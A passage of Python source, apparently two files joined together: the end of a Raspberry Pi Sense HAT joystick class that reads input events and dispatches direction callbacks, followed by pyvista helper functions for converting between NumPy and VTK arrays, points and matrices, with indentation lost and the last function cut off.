the joystick also acts as a keyboard. On the command line, this can mean
that joystick movements (buffered during a script's execution) can
inadvertently execute historical commands (e.g. Up a few times followed by
Enter).
Finally, if the *emulate* parameter is ``True``, the instance will connect
to the joystick in the `desktop Sense HAT emulator`_ instead of the "real"
Sense HAT joystick.
.. _desktop Sense HAT emulator: https://sense-emu.readthedocs.io/
"""
# pylint: disable=too-many-instance-attributes
__slots__ = (
'_flush',
'_callbacks_lock',
'_callbacks_close',
'_callbacks',
'_callbacks_thread',
'_closing',
'_stream',
'_buffer',
'_read_thread',
'_pressed',
'_held',
'_rotation',
'_rot_map',
)
SENSE_HAT_EVDEV_NAME = 'Raspberry Pi Sense HAT Joystick'
EVENT_FORMAT = native_str('llHHI')
EVENT_SIZE = struct.calcsize(EVENT_FORMAT)
EV_KEY = 0x01
STATE_RELEASE = 0
STATE_PRESS = 1
STATE_HOLD = 2
KEY_UP = 103
KEY_LEFT = 105
KEY_RIGHT = 106
KEY_DOWN = 108
KEY_ENTER = 28
def __init__(self, max_events=100, flush_input=True, emulate=False):
self._flush = flush_input
self._callbacks_lock = Lock()
self._callbacks_close = Event()
self._callbacks = {}
self._callbacks_thread = None
self._closing = Event()
self._stream = False
self._buffer = Queue(maxsize=max_events)
if emulate:
from sense_emu.stick import init_stick_client
stick_file = init_stick_client()
else:
stick_file = io.open(self._stick_device(), 'rb', buffering=0)
self._read_thread = Thread(target=self._read_stick, args=(stick_file,))
self._read_thread.daemon = True
self._read_thread.start()
# This is just a guess; we can't know the actual joystick state at
# initialization. However, if it's incorrect, future events should
# correct this
self._pressed = set()
self._held = set()
self._rotation = 0
self._rot_map = {
SenseStick.KEY_UP: SenseStick.KEY_RIGHT,
SenseStick.KEY_LEFT: SenseStick.KEY_UP,
SenseStick.KEY_DOWN: SenseStick.KEY_LEFT,
SenseStick.KEY_RIGHT: SenseStick.KEY_DOWN,
SenseStick.KEY_ENTER: SenseStick.KEY_ENTER,
}
def close(self):
"""
Call the :meth:`close` method to close the joystick interface and free
up any background resources. The method is idempotent (you can call it
multiple times without error) and after it is called, any operations on
the joystick may return an error (but are not guaranteed to do so).
"""
if self._read_thread is not None:
self._closing.set()
self._read_thread.join()
if self._callbacks_thread:
self._callbacks_thread.join()
self._read_thread = None
self._callbacks_thread = None
self._buffer = None
if self._flush:
self._flush = False
try:
termios.tcflush(0, termios.TCIFLUSH)
except termios.error:
# If stdin isn't a tty (or isn't available), ignore the error
pass
def __iter__(self):
while True:
yield self.read(0 if self._stream else None)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, exc_tb):
self.close()
@staticmethod
def _stick_device():
for evdev in glob.glob('/sys/class/input/event*'):
try:
with io.open(os.path.join(evdev, 'device', 'name'), 'r') as f:
if f.read().strip() == SenseStick.SENSE_HAT_EVDEV_NAME:
return os.path.join('/dev', 'input', os.path.basename(evdev))
except IOError as exc:
if exc.errno != errno.ENOENT:
raise
raise RuntimeError('unable to locate SenseHAT joystick device')
def _read_stick(self, stick_file):
try:
while not self._closing.wait(0):
if select.select([stick_file], [], [], 0.1)[0]:
event = stick_file.read(SenseStick.EVENT_SIZE)
if event == b'':
# This is mostly to ease testing, but also deals with
# some edge cases
break
(
tv_sec,
tv_usec,
evt_type,
code,
value,
) = struct.unpack(SenseStick.EVENT_FORMAT, event)
if evt_type == SenseStick.EV_KEY:
if self._buffer.full():
warnings.warn(SenseStickBufferFull(
"The internal SenseStick buffer is full; "
"try reading some events!"))
self._buffer.get()
r = self._rotation
while r:
code = self._rot_map[code]
r -= 90
evt = StickEvent(
timestamp=datetime.fromtimestamp(
tv_sec + (tv_usec / 1000000)
),
direction={
SenseStick.KEY_UP: 'up',
SenseStick.KEY_DOWN: 'down',
SenseStick.KEY_LEFT: 'left',
SenseStick.KEY_RIGHT: 'right',
SenseStick.KEY_ENTER: 'enter',
}[code],
pressed=(value != SenseStick.STATE_RELEASE),
held=(value == SenseStick.STATE_HOLD or (
value == SenseStick.STATE_RELEASE and
code in self._held))
)
if not evt.pressed:
self._pressed -= {code}
self._held -= {code}
elif evt.held:
self._pressed |= {code} # to correct state
self._held |= {code}
else: # pressed
self._pressed |= {code}
self._held -= {code} # to correct state
# Only push event onto the queue once the internal
# state is updated; this ensures the various read-only
# properties will be accurate for event handlers that
# subsequently fire (although if they take too long the
# state may change again before the next handler fires)
self._buffer.put(evt)
finally:
stick_file.close()
def _run_callbacks(self):
while not self._callbacks_close.wait(0) and not self._closing.wait(0):
try:
event = self._buffer.get(timeout=0.1)
except Empty:
pass
else:
with self._callbacks_lock:
try:
callback = self._callbacks[event.direction]
except KeyError:
callback = None
if callback is not None:
callback(event)
def _start_stop_callbacks(self):
with self._callbacks_lock:
if self._callbacks and not self._callbacks_thread:
self._callbacks_close.clear()
self._callbacks_thread = Thread(target=self._run_callbacks)
self._callbacks_thread.daemon = True
self._callbacks_thread.start()
elif not self._callbacks and self._callbacks_thread:
self._callbacks_close.set()
self._callbacks_thread.join()
self._callbacks_thread = None
@property
def rotation(self):
"""
Specifies the rotation (really, the orientation) of the joystick as a
multiple of 90 degrees. When rotation is 0 (the default), "up" is
toward the GPIO pins:
.. image:: images/rotation_0.*
When rotation is 90, "up" is towards the LEDs, and so on:
.. image:: images/rotation_90.*
The other two rotations are trivial to derive from this.
.. note::
This property is updated by the unifying :attr:`SenseHAT.rotation`
attribute.
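For example, to make "up" point towards the LEDs (this sketch assumes a
:class:`SenseHAT` instance named ``hat``)::
hat.stick.rotation = 90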
"""
return self._rotation
@rotation.setter
def rotation(self, value):
# TODO If rotation is modified while _pressed and _held aren't empty
# then we potentially have bad state (unless it's just ENTER);
# technically we should anti-rotate their current values here...
if value % 90:
raise ValueError('rotation must be a multiple of 90')
self._rotation = value % 360
def read(self, timeout=None):
"""
Wait up to *timeout* seconds for another joystick event. If one occurs,
return it as a :class:`StickEvent`, otherwise return ``None``.
.. note::
Attempting to call this method when callbacks are assigned to
attributes like :attr:`when_left` will trigger a
:exc:`SenseStickCallbackRead` warning. This is because using the
callback mechanism causes a background thread to continually read
joystick events (removing them from the queue that :meth:`read`
accesses). Mixing these programming styles can result in missing
events.
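For example, the following sketch (assuming a :class:`SenseHAT` instance
named ``hat``) waits up to five seconds for a single event::
event = hat.stick.read(5)
if event is not None and event.pressed:
    print('Joystick moved %s' % event.direction)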
"""
if self._callbacks_thread is not None:
warnings.warn(SenseStickCallbackRead(
'read called while when_* callbacks are assigned'))
try:
return self._buffer.get(timeout=timeout)
except Empty:
return None
@property
def stream(self):
"""
When ``True``, treating the joystick as an iterator will always yield
immediately (yielding ``None`` if no event has occurred). When
``False`` (the default), the iterator will only yield when an event
has occurred.
.. note::
This property can be set while an iterator is active, but if the
current value is ``False``, the iterator will wait indefinitely
for the next event *before* it will start returning ``None``. It
is better to set this property *prior* to obtaining the iterator.
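For example, the following sketch (assuming a :class:`SenseHAT` instance
named ``hat``) polls the joystick without blocking::
hat.stick.stream = True
for event in hat.stick:
    if event is not None:
        print(event.direction)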
"""
return self._stream
@stream.setter
def stream(self, value):
self._stream = bool(value)
@property
def up(self):
"""
Returns ``True`` if the joystick is currently pressed upward.
"""
# pylint: disable=invalid-name
return SenseStick.KEY_UP in self._pressed
@property
def up_held(self):
"""
Returns ``True`` if the joystick is currently held upward.
"""
return SenseStick.KEY_UP in self._held
@property
def when_up(self):
"""
The function to call when the joystick is moved upward.
"""
with self._callbacks_lock:
return self._callbacks.get('up')
@when_up.setter
def when_up(self, value):
with self._callbacks_lock:
if value:
self._callbacks['up'] = value
else:
self._callbacks.pop('up', None)
self._start_stop_callbacks()
@property
def down(self):
"""
Returns ``True`` if the joystick is currently pressed downward.
"""
return SenseStick.KEY_DOWN in self._pressed
@property
def down_held(self):
"""
Returns ``True`` if the joystick is currently held downward.
"""
return SenseStick.KEY_DOWN in self._held
@property
def when_down(self):
"""
The function to call when the joystick is moved downward.
"""
with self._callbacks_lock:
return self._callbacks.get('down')
@when_down.setter
def when_down(self, value):
with self._callbacks_lock:
if value:
self._callbacks['down'] = value
else:
self._callbacks.pop('down', None)
self._start_stop_callbacks()
@property
def left(self):
"""
Returns ``True`` if the joystick is currently pressed leftward.
"""
return SenseStick.KEY_LEFT in self._pressed
@property
def left_held(self):
"""
Returns ``True`` if the joystick is currently held leftward.
"""
return SenseStick.KEY_LEFT in self._held
@property
def when_left(self):
"""
The function to call when the joystick is moved leftward.
"""
with self._callbacks_lock:
return self._callbacks.get('left')
@when_left.setter
def when_left(self, value):
with self._callbacks_lock:
if value:
self._callbacks['left'] = value
else:
self._callbacks.pop('left', None)
self._start_stop_callbacks()
@property
def right(self):
"""
Returns ``True`` if the joystick is currently pressed rightward.
"""
return SenseStick.KEY_RIGHT in self._pressed
@property
def right_held(self):
"""
Returns ``True`` if the joystick is currently held rightward.
"""
return SenseStick.KEY_RIGHT in self._held
@property
def when_right(self):
"""
The function to call when the joystick is moved rightward.
"""
with self._callbacks_lock:
return self._callbacks.get('right')
@when_right.setter
def when_right(self, value):
with self._callbacks_lock:
if value:
self._callbacks['right'] = value
else:
self._callbacks.pop('right', None)
self._start_stop_callbacks()
@property
def enter(self):
"""
Returns ``True`` if the joystick is currently pressed inward.
"""
return SenseStick.KEY_ENTER in self._pressed
@property
def enter_held(self):
"""
Returns ``True`` if the joystick is currently held inward.
"""
return SenseStick.KEY_ENTER in self._held
@property
def when_enter(self):
"""
The function to call when the joystick is pressed in or released.
"""
with self._callbacks_lock:
return self._callbacks.get('enter')
@when_enter.setter
def when_enter(self, value):
with self._callbacks_lock:
if value:
self._callbacks['enter'] = value
else:
self._callbacks.pop('enter', None)
self._start_stop_callbacks()
|
helpers.py
|
"""Supporting functions for polydata and grid objects."""
import collections.abc
import enum
import logging
import os
import signal
import sys
import threading
from threading import Thread
import traceback
from typing import Optional
import warnings
import numpy as np
import pyvista
from pyvista import _vtk
from pyvista.errors import AmbiguousDataError, MissingDataError
from . import transformations
from .fileio import from_meshio
class FieldAssociation(enum.Enum):
"""Represents which type of vtk field a scalar or vector array is associated with."""
POINT = _vtk.vtkDataObject.FIELD_ASSOCIATION_POINTS
CELL = _vtk.vtkDataObject.FIELD_ASSOCIATION_CELLS
NONE = _vtk.vtkDataObject.FIELD_ASSOCIATION_NONE
ROW = _vtk.vtkDataObject.FIELD_ASSOCIATION_ROWS
def get_vtk_type(typ):
"""Look up the VTK type for a given numpy data type.
Corrects for string type mapping issues.
Parameters
----------
typ : numpy.dtype
Numpy data type.
Returns
-------
int
Integer type id specified in ``vtkType.h``
"""
typ = _vtk.get_vtk_array_type(typ)
# This handles a silly string type bug
if typ == 3:
return 13
return typ
def vtk_bit_array_to_char(vtkarr_bint):
"""Cast vtk bit array to a char array.
Parameters
----------
vtkarr_bint : vtk.vtkBitArray
VTK binary array.
Returns
-------
vtk.vtkCharArray
VTK char array.
Notes
-----
This performs a copy.
"""
vtkarr = _vtk.vtkCharArray()
vtkarr.DeepCopy(vtkarr_bint)
return vtkarr
def vtk_id_list_to_array(vtk_id_list):
"""Convert a vtkIdList to a NumPy array.
Parameters
----------
vtk_id_list : vtk.vtkIdList
VTK ID list.
Returns
-------
numpy.ndarray
Array of IDs.
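Examples
--------
A minimal sketch, assuming the ``vtk`` package is importable directly:
>>> import vtk
>>> id_list = vtk.vtkIdList()
>>> _ = id_list.InsertNextId(7)
>>> vtk_id_list_to_array(id_list)
array([7])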
"""
return np.array([vtk_id_list.GetId(i) for i in range(vtk_id_list.GetNumberOfIds())])
def convert_string_array(arr, name=None):
"""Convert a numpy array of strings to a vtkStringArray or vice versa.
Parameters
----------
arr : numpy.ndarray
Numpy string array to convert.
name : str, optional
Name to set the vtkStringArray to.
Returns
-------
vtkStringArray
VTK string array.
Notes
-----
Note that this is terribly inefficient. If you have ideas on how
to make this faster, please consider opening a pull request.
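Examples
--------
A minimal sketch (``convert_string_array`` is the function documented here):
>>> import numpy as np
>>> arr = np.array(['a', 'b', 'c'])
>>> vtkarr = convert_string_array(arr, name='letters')
>>> vtkarr.GetName()
'letters'
>>> vtkarr.GetNumberOfValues()
3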
"""
if isinstance(arr, np.ndarray):
vtkarr = _vtk.vtkStringArray()
########### OPTIMIZE ###########
for val in arr:
vtkarr.InsertNextValue(val)
################################
if isinstance(name, str):
vtkarr.SetName(name)
return vtkarr
# Otherwise it is a vtk array and needs to be converted back to numpy
############### OPTIMIZE ###############
nvalues = arr.GetNumberOfValues()
return np.array([arr.GetValue(i) for i in range(nvalues)], dtype='|U')
########################################
def convert_array(arr, name=None, deep=False, array_type=None):
"""Convert a NumPy array to a vtkDataArray or vice versa.
Parameters
----------
arr : np.ndarray or vtkDataArray
A numpy array or vtkDataArray to convert.
name : str, optional
The name of the data array for VTK.
deep : bool, optional
If input is numpy array then deep copy values.
array_type : int, optional
VTK array type ID as specified in ``vtkType.h``.
Returns
-------
vtkDataArray or numpy.ndarray
The converted array. If input is a :class:`numpy.ndarray` then
returns ``vtkDataArray``, or if input is ``vtkDataArray`` then
returns NumPy ``ndarray``.
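Examples
--------
A minimal round-trip sketch (``convert_array`` is the function documented
here):
>>> import numpy as np
>>> arr = np.linspace(0, 1, 5)
>>> vtk_arr = convert_array(arr, name='scalars')
>>> vtk_arr.GetName()
'scalars'
>>> np.allclose(convert_array(vtk_arr), arr)
True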
"""
if arr is None:
return
if isinstance(arr, (list, tuple)):
arr = np.array(arr)
if isinstance(arr, np.ndarray):
if arr.dtype == np.dtype('O'):
arr = arr.astype('|S')
arr = np.ascontiguousarray(arr)
if arr.dtype.type in (np.str_, np.bytes_):
# This handles strings
vtk_data = convert_string_array(arr)
else:
# This will handle numerical data
arr = np.ascontiguousarray(arr)
vtk_data = _vtk.numpy_to_vtk(num_array=arr, deep=deep, array_type=array_type)
if isinstance(name, str):
vtk_data.SetName(name)
return vtk_data
# Otherwise input must be a vtkDataArray
if not isinstance(arr, (_vtk.vtkDataArray, _vtk.vtkBitArray, _vtk.vtkStringArray)):
raise TypeError(f'Invalid input array type ({type(arr)}).')
# Handle booleans
if isinstance(arr, _vtk.vtkBitArray):
arr = vtk_bit_array_to_char(arr)
# Handle string arrays
if isinstance(arr, _vtk.vtkStringArray):
return convert_string_array(arr)
# Convert from vtkDataArray to NumPy
return _vtk.vtk_to_numpy(arr)
def is_pyvista_dataset(obj):
"""Return ``True`` if the object is a PyVista wrapped dataset.
Parameters
----------
obj : anything
Any object to test.
Returns
-------
bool
``True`` when the object is a :class:`pyvista.DataSet` or :class:`pyvista.MultiBlock`.
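Examples
--------
A short sketch (assuming ``pyvista`` is importable):
>>> import pyvista
>>> is_pyvista_dataset(pyvista.PolyData())
True
>>> is_pyvista_dataset([1, 2, 3])
False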
"""
return isinstance(obj, (pyvista.DataSet, pyvista.MultiBlock))
def _assoc_array(obj, name, association='point'):
"""Return a point, cell, or field array from a pyvista.DataSet or VTK object.
If the array or index doesn't exist, return nothing. This matches VTK's
behavior when using ``GetAbstractArray`` with an invalid key or index.
"""
vtk_attr = f'Get{association.title()}Data'
python_attr = f'{association.lower()}_data'
if isinstance(obj, pyvista.DataSet):
try:
return getattr(obj, python_attr).get_array(name)
except KeyError: # pragma: no cover
return None
abstract_array = getattr(obj, vtk_attr)().GetAbstractArray(name)
if abstract_array is not None:
return pyvista.pyvista_ndarray(abstract_array)
return None
def point_array(obj, name):
"""Return point array of a pyvista or vtk object.
Parameters
----------
obj : pyvista.DataSet or vtk.vtkDataSet
PyVista or VTK dataset.
name : str or int
Name or index of the array.
Returns
-------
pyvista.pyvista_ndarray or None
Wrapped array if the index or name is valid. Otherwise, ``None``.
"""
return _assoc_array(obj, name, 'point')
def field_array(obj, name):
"""Return field data of a pyvista or vtk object.
Parameters
----------
obj : pyvista.DataSet or vtk.vtkDataSet
PyVista or VTK dataset.
name : str or int
Name or index of the array.
Returns
-------
pyvista.pyvista_ndarray or None
Wrapped array if the index or name is valid. Otherwise, ``None``.
"""
return _assoc_array(obj, name, 'field')
def cell_array(obj, name):
"""Return cell array of a pyvista or vtk object.
Parameters
----------
obj : pyvista.DataSet or vtk.vtkDataSet
PyVista or VTK dataset.
name : str or int
Name or index of the array.
Returns
-------
pyvista.pyvista_ndarray or None
Wrapped array if the index or name is valid. Otherwise, ``None``.
"""
return _assoc_array(obj, name, 'cell')
def row_array(obj, name):
"""Return row array of a vtk object.
Parameters
----------
obj : vtk.vtkDataSet
PyVista or VTK dataset.
name : str
Name of the array.
Returns
-------
numpy.ndarray
Wrapped array.
"""
vtkarr = obj.GetRowData().GetAbstractArray(name)
return convert_array(vtkarr)
def parse_field_choice(field):
"""Return a field association object for a given field type string.
Parameters
----------
field : str, FieldAssociation
Name of the field (e.g, ``'cell'``, ``'field'``, ``'point'``,
``'row'``).
Returns
-------
pyvista.FieldAssociation
Field association.
"""
if isinstance(field, str):
field = field.strip().lower()
if field in ['cell', 'c', 'cells']:
field = FieldAssociation.CELL
elif field in ['point', 'p', 'points']:
field = FieldAssociation.POINT
elif field in ['field', 'f', 'fields']:
field = FieldAssociation.NONE
elif field in ['row', 'r']:
field = FieldAssociation.ROW
else:
raise ValueError(f'Data field ({field}) not supported.')
elif isinstance(field, FieldAssociation):
pass
else:
raise TypeError(f'Data field ({field}) not supported.')
return field
def get_array(mesh, name, preference='cell', err=False) -> Optional[np.ndarray]:
"""Search point, cell and field data for an array.
Parameters
----------
mesh : pyvista.DataSet
Dataset to get the array from.
name : str
The name of the array to get the range.
preference : str, optional
If the named array exists in more than one association, this is the
preferred association to return. Must be either ``'point'``,
``'cell'``, or ``'field'``.
err : bool, optional
Whether to throw an error if array is not present.
Returns
-------
pyvista.pyvista_ndarray or ``None``
Requested array. Return ``None`` if there is no array
matching the ``name`` and ``err=False``.
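Examples
--------
A minimal sketch (``get_array`` is the function documented here):
>>> import numpy as np
>>> import pyvista
>>> mesh = pyvista.PolyData(np.zeros((3, 3)))
>>> mesh.point_data['values'] = np.arange(3)
>>> get_array(mesh, 'values', preference='point').tolist()
[0, 1, 2]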
"""
if isinstance(mesh, _vtk.vtkTable):
arr = row_array(mesh, name)
if arr is None and err:
raise KeyError(f'Data array ({name}) not present in this dataset.')
return arr
parr = point_array(mesh, name)
carr = cell_array(mesh, name)
farr = field_array(mesh, name)
preference = parse_field_choice(preference)
if sum([array is not None for array in (parr, carr, farr)]) > 1:
if preference == FieldAssociation.CELL:
return carr
elif preference == FieldAssociation.POINT:
return parr
elif preference == FieldAssociation.NONE:
return farr
else:
raise ValueError(f'Data field ({preference}) not supported.')
if parr is not None:
return parr
elif carr is not None:
return carr
elif farr is not None:
return farr
elif err:
raise KeyError(f'Data array ({name}) not present in this dataset.')
return None
def get_array_association(mesh, name, preference='cell', err=False) -> FieldAssociation:
"""Return the array association.
Parameters
----------
mesh : pyvista.DataSet
Dataset to get the array association from.
name : str
The name of the array.
preference : str, optional
If the named array exists in more than one association, this is the
preferred association to return. Must be either ``'point'``,
``'cell'``, or ``'field'``.
err : bool, optional
Boolean to control whether to throw an error if array is not
present.
Returns
-------
pyvista.FieldAssociation
Association of the array. If array is not present and ``err`` is
``False``, ``FieldAssociation.NONE`` is returned.
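Examples
--------
A minimal sketch (``get_array_association`` is the function documented
here):
>>> import numpy as np
>>> import pyvista
>>> mesh = pyvista.PolyData(np.zeros((3, 3)))
>>> mesh.point_data['values'] = np.arange(3)
>>> get_array_association(mesh, 'values') == FieldAssociation.POINT
True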
"""
if isinstance(mesh, _vtk.vtkTable):
arr = row_array(mesh, name)
if arr is None and err:
raise KeyError(f'Data array ({name}) not present in this dataset.')
return FieldAssociation.ROW
# with multiple arrays, return the array preference if possible
parr = point_array(mesh, name)
carr = cell_array(mesh, name)
farr = field_array(mesh, name)
arrays = [parr, carr, farr]
preferences = [FieldAssociation.POINT, FieldAssociation.CELL, FieldAssociation.NONE]
preference = parse_field_choice(preference)
if preference not in preferences:
raise ValueError(f'Data field ({preference}) not supported.')
matches = [pref for pref, array in zip(preferences, arrays) if array is not None]
# optionally raise if no match
if not matches:
if err:
raise KeyError(f'Data array ({name}) not present in this dataset.')
return FieldAssociation.NONE
# use preference if it applies
if preference in matches:
return preference
# otherwise return first in order of point -> cell -> field
return matches[0]
def vtk_points(points, deep=True, force_float=False):
"""Convert numpy array or array-like to a ``vtkPoints`` object.
Parameters
----------
points : numpy.ndarray or sequence
Points to convert. Should be 1 or 2 dimensional. Accepts a
single point or several points.
deep : bool, optional
Perform a deep copy of the array. Only applicable if
``points`` is a :class:`numpy.ndarray`.
force_float : bool, optional
Casts the datatype to ``float32`` if points datatype is
non-float. Set this to ``False`` to allow non-float types,
though this may lead to truncation of intermediate floats
when transforming datasets.
Returns
-------
vtk.vtkPoints
The vtkPoints object.
Examples
--------
>>> import pyvista
>>> import numpy as np
>>> points = np.random.random((10, 3))
>>> vpoints = pyvista.vtk_points(points)
>>> vpoints # doctest:+SKIP
(vtkmodules.vtkCommonCore.vtkPoints)0x7f0c2e26af40
"""
points = np.asanyarray(points)
# verify is numeric
if not np.issubdtype(points.dtype, np.number):
raise TypeError('Points must be a numeric type')
if force_float:
if not np.issubdtype(points.dtype, np.floating):
warnings.warn(
'Points is not a float type. This can cause issues when '
'transforming or applying filters. Casting to '
'``np.float32``. Disable this by passing '
'``force_float=False``.'
)
points = points.astype(np.float32)
# check dimensionality
if points.ndim == 1:
points = points.reshape(-1, 3)
elif points.ndim > 2:
raise ValueError(f'Dimension of ``points`` should be 1 or 2, not {points.ndim}')
# verify shape
if points.shape[1] != 3:
raise ValueError(
'Points array must contain three values per point. '
f'Shape is {points.shape} and should be (X, 3)'
)
# points must be contiguous
points = np.require(points, requirements=['C'])
vtkpts = _vtk.vtkPoints()
vtk_arr = _vtk.numpy_to_vtk(points, deep=deep)
vtkpts.SetData(vtk_arr)
return vtkpts
def line_segments_from_points(points):
"""Generate non-connected line segments from points.
Assumes points are ordered as line segments and an even number of
points.
Parameters
----------
points : numpy.ndarray
Points representing line segments. An even number must be
given as every two vertices represent a single line
segment. For example, two line segments would be represented
as ``np.array([[0, 0, 0], [1, 0, 0], [1, 0, 0], [1, 1, 0]])``.
Returns
-------
pyvista.PolyData
PolyData with lines and cells.
Examples
--------
This example plots two line segments at right angles to each other.
>>> import pyvista
>>> import numpy as np
>>> points = np.array([[0, 0, 0], [1, 0, 0], [1, 0, 0], [1, 1, 0]])
>>> lines = pyvista.line_segments_from_points(points)
>>> lines.plot()
"""
if len(points) % 2 != 0:
raise ValueError("An even number of points must be given to define each segment.")
# Assuming ordered points, create array defining line order
n_points = len(points)
n_lines = n_points // 2
lines = np.c_[
(
2 * np.ones(n_lines, np.int_),
np.arange(0, n_points - 1, step=2),
np.arange(1, n_points + 1, step=2),
)
]
poly = pyvista.PolyData()
poly.points = points
poly.lines = lines
return poly
def lines_from_points(points, close=False):
"""Make a connected line set given an array of points.
Parameters
----------
points : np.ndarray
Points representing the vertices of the connected
segments. For example, two line segments would be represented
as ``np.array([[0, 0, 0], [1, 0, 0], [1, 1, 0]])``.
close : bool, optional
If ``True``, close the line segments into a loop.
Returns
-------
pyvista.PolyData
PolyData with lines and cells.
Examples
--------
>>> import numpy as np
>>> import pyvista
>>> points = np.array([[0, 0, 0], [1, 0, 0], [1, 1, 0]])
>>> poly = pyvista.lines_from_points(points)
>>> poly.plot(line_width=5)
"""
poly = pyvista.PolyData()
poly.points = points
cells = np.full((len(points) - 1, 3), 2, dtype=np.int_)
cells[:, 1] = np.arange(0, len(points) - 1, dtype=np.int_)
cells[:, 2] = np.arange(1, len(points), dtype=np.int_)
if close:
cells = np.append(cells, [[2, len(points) - 1, 0]], axis=0)
poly.lines = cells
return poly
def make_tri_mesh(points, faces):
"""Construct a ``pyvista.PolyData`` mesh using points and faces arrays.
Construct a mesh from an Nx3 array of points and an Mx3 array of
triangle indices, resulting in a mesh with N vertices and M
triangles. This function does not require the standard VTK
"padding" column and simplifies mesh creation.
Parameters
----------
points : np.ndarray
Array of points with shape ``(N, 3)`` storing the vertices of the
triangle mesh.
faces : np.ndarray
Array of indices with shape ``(M, 3)`` containing the triangle
indices.
Returns
-------
pyvista.PolyData
PolyData instance containing the triangle mesh.
Examples
--------
This example discretizes the unit square into a triangle mesh with
nine vertices and eight faces.
>>> import numpy as np
>>> import pyvista
>>> points = np.array([[0, 0, 0], [0.5, 0, 0], [1, 0, 0], [0, 0.5, 0],
... [0.5, 0.5, 0], [1, 0.5, 0], [0, 1, 0], [0.5, 1, 0],
... [1, 1, 0]])
>>> faces = np.array([[0, 1, 4], [4, 7, 6], [2, 5, 4], [4, 5, 8],
... [0, 4, 3], [3, 4, 6], [1, 2, 4], [4, 8, 7]])
>>> tri_mesh = pyvista.make_tri_mesh(points, faces)
>>> tri_mesh.plot(show_edges=True, line_width=5)
"""
if points.shape[1] != 3:
raise ValueError("Points array should have shape (N, 3).")
if faces.ndim != 2 or faces.shape[1] != 3:
raise ValueError("Face array should have shape (M, 3).")
cells = np.empty((faces.shape[0], 4), dtype=faces.dtype)
cells[:, 0] = 3
cells[:, 1:] = faces
return pyvista.PolyData(points, cells)
def vector_poly_data(orig, vec):
"""Create a pyvista.PolyData object composed of vectors.
Parameters
----------
orig : numpy.ndarray
Array of vector origins.
vec : numpy.ndarray
Array of vectors.
Returns
-------
pyvista.PolyData
Mesh containing the ``orig`` points along with the
``'vectors'`` and ``'mag'`` point arrays representing the
        vectors and magnitude of the vectors at each point.
Examples
--------
Create basic vector field. This is a point cloud where each point
has a vector and magnitude attached to it.
>>> import pyvista
>>> import numpy as np
>>> x, y = np.meshgrid(np.linspace(-5,5,10),np.linspace(-5,5,10))
>>> points = np.vstack((x.ravel(), y.ravel(), np.zeros(x.size))).T
>>> u = x/np.sqrt(x**2 + y**2)
>>> v = y/np.sqrt(x**2 + y**2)
>>> vectors = np.vstack((u.ravel()**3, v.ravel()**3, np.zeros(u.size))).T
>>> pdata = pyvista.vector_poly_data(points, vectors)
>>> pdata.point_data.keys()
['vectors', 'mag']
Convert these to arrows and plot it.
>>> pdata.glyph(orient='vectors', scale='mag').plot()
"""
# shape, dimension checking
if not isinstance(orig, np.ndarray):
orig = np.asarray(orig)
if not isinstance(vec, np.ndarray):
vec = np.asarray(vec)
if orig.ndim != 2:
orig = orig.reshape((-1, 3))
elif orig.shape[1] != 3:
raise ValueError('orig array must be 3D')
if vec.ndim != 2:
vec = vec.reshape((-1, 3))
elif vec.shape[1] != 3:
raise ValueError('vec array must be 3D')
# Create vtk points and cells objects
vpts = _vtk.vtkPoints()
vpts.SetData(_vtk.numpy_to_vtk(np.ascontiguousarray(orig), deep=True))
npts = orig.shape[0]
cells = np.empty((npts, 2), dtype=pyvista.ID_TYPE)
cells[:, 0] = 1
cells[:, 1] = np.arange(npts, dtype=pyvista.ID_TYPE)
vcells = pyvista.utilities.cells.CellArray(cells, npts)
# Create vtkPolyData object
pdata = _vtk.vtkPolyData()
pdata.SetPoints(vpts)
pdata.SetVerts(vcells)
# Add vectors to polydata
name = 'vectors'
vtkfloat = _vtk.numpy_to_vtk(np.ascontiguousarray(vec), deep=True)
vtkfloat.SetName(name)
pdata.GetPointData().AddArray(vtkfloat)
pdata.GetPointData().SetActiveVectors(name)
# Add magnitude of vectors to polydata
name = 'mag'
scalars = (vec * vec).sum(1) ** 0.5
vtkfloat = _vtk.numpy_to_vtk(np.ascontiguousarray(scalars), deep=True)
vtkfloat.SetName(name)
pdata.GetPointData().AddArray(vtkfloat)
pdata.GetPointData().SetActiveScalars(name)
return pyvista.PolyData(pdata)
def trans_from_matrix(matrix): # pragma: no cover
"""Convert a vtk matrix to a numpy.ndarray.
DEPRECATED: Please use ``array_from_vtkmatrix``.
"""
# import needs to happen here to prevent a circular import
from pyvista.core.errors import DeprecationError
raise DeprecationError('DEPRECATED: Please use ``array_from_vtkmatrix``.')
def array_from_vtkmatrix(matrix):
"""Convert a vtk matrix to an array.
Parameters
----------
matrix : vtk.vtkMatrix3x3 or vtk.vtkMatrix4x4
The vtk matrix to be converted to a ``numpy.ndarray``.
Returned ndarray has shape (3, 3) or (4, 4) as appropriate.
Returns
-------
numpy.ndarray
Numpy array containing the data from ``matrix``.
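    Examples
    --------
    A minimal sketch, assuming ``vtk`` is importable; a freshly created
    ``vtkMatrix4x4`` defaults to the identity matrix.
    >>> import vtk
    >>> import pyvista
    >>> mat = vtk.vtkMatrix4x4()
    >>> pyvista.array_from_vtkmatrix(mat)  # doctest:+SKIP
    array([[1., 0., 0., 0.],
           [0., 1., 0., 0.],
           [0., 0., 1., 0.],
           [0., 0., 0., 1.]])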
"""
if isinstance(matrix, _vtk.vtkMatrix3x3):
shape = (3, 3)
elif isinstance(matrix, _vtk.vtkMatrix4x4):
shape = (4, 4)
else:
raise TypeError(
'Expected vtk.vtkMatrix3x3 or vtk.vtkMatrix4x4 input,'
f' got {type(matrix).__name__} instead.'
)
array = np.zeros(shape)
for i in range(shape[0]):
for j in range(shape[1]):
array[i, j] = matrix.GetElement(i, j)
return array
def vtkmatrix_from_array(array):
"""Convert a ``numpy.ndarray`` or array-like to a vtk matrix.
Parameters
----------
array : numpy.ndarray or array-like
The array or array-like to be converted to a vtk matrix.
Shape (3, 3) gets converted to a ``vtk.vtkMatrix3x3``, shape (4, 4)
gets converted to a ``vtk.vtkMatrix4x4``. No other shapes are valid.
Returns
-------
vtk.vtkMatrix3x3 or vtk.vtkMatrix4x4
VTK matrix.
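    Examples
    --------
    A minimal sketch converting a 4x4 identity array; the variable names
    are illustrative only.
    >>> import numpy as np
    >>> import pyvista
    >>> mat = pyvista.vtkmatrix_from_array(np.eye(4))
    >>> mat.GetElement(0, 0)  # doctest:+SKIP
    1.0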
"""
array = np.asarray(array)
if array.shape == (3, 3):
matrix = _vtk.vtkMatrix3x3()
elif array.shape == (4, 4):
matrix = _vtk.vtkMatrix4x4()
else:
